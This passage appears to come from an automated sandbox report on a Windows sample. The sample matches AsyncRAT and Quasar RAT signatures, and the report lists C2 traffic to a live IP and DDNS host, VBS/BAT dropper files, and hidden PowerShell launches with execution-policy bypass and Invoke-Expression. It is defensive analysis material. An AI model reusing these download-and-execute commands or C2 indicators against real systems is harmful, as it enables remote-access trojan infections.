4b 68 22 52 ff 13 92 11 55 2b
              Source: global traffic | HTTP traffic detected: GET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 212.23.222.200:222 | Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Thu, 07 Mar 2024 01:32:20 GMT | User-Agent: Microsoft BITS/7.8 | Host: 212.23.222.200:222
              Source: unknown | DNS traffic detected: queries for: shefonew07.ddns.net
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200/
              Source: svchost.exe, 00000005.00000002.3363633322.000001B3F889D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28234000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2184867444.000001B3F86C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3362132937.000001B3F3F40000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3362325137.000001B3F3B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3361893413.000001B3F8A20000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.3363633322.000001B3F8885000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.3361909883.000001B3F8C30000.00000004.00000800.00020000.00000000.sdmp, sExygfKkJDoIUpeo[1].txt.0.dr, qmgr.db.5.dr, edb.log.5.dr, NDKJPlEEYLhKqtGW.xml.0.dr | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259396979.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259220217.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt
              Source: wscript.exe, 00000000.00000003.2075147627.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075013439.00000230DEDC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073866186.00000230DEDC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259363764.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075056628.00000230DEDF2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt-
              Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.h
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt=
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC:
              Source: wscript.exe, 00000000.00000003.2075096466.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEDC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259396979.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259220217.00000230DEDC0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtHipCnxPXXkVjHFzoPKBdNvbdd41UoIiutyTAq
              Source: wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEM
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtX
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtf
              Source: wscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvh
              Source: RegSvcs.exe, 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: RegSvcs.exe, 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.5.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: edb.log.5.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: RegSvcs.exe, 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c%
              Source: powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.cRooCerA
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D288FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 00000005.00000003.2102025199.000001B3F86C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: powershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.2192080087.0000016D29A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DB39D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2260569508.00000230DD073000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
              Source: powershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR

              System Summary

              Source: dump.pcap, type: PCAP | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT | Author: Florian Roth
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 00000016.00000002.4626854201.0000000005247000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4523483443.0000000001029000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT | Author: Florian Roth
              Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT | Author: Florian Roth
              Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 | Author: unknown
              Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys | Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: Process Memory Space: RegSvcs.exe PID: 3728, type: MEMORYSTR | Matched rule: Detects AsyncRAT | Author: ditekSHen
              Source: BIT87CA.tmp.5.dr | Zip Entry: TextCZvTbYMEYspgaPVo.vbs
              Source: BIT87CA.tmp.5.dr | Zip Entry: NewRdpFirstTry.vbs
              Source: BIT87CA.tmp.5.dr | Zip Entry: nKNmegHQBbmlQMTN.bat
              Source: BIT87CA.tmp.5.dr | Zip Entry: solankedoubledigits.bat
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348AC568
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348A91F6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348A44F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B4CFB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B75FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348A5EF2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B172D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348A2098
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD348B609D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD3489587B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34894FED
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD348956FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD348946F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34893F5B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34893D42
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00007FFD34895445
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34893965
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34894315
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD348966B8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD348957FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD34893BF3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD349635E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072BE6B0
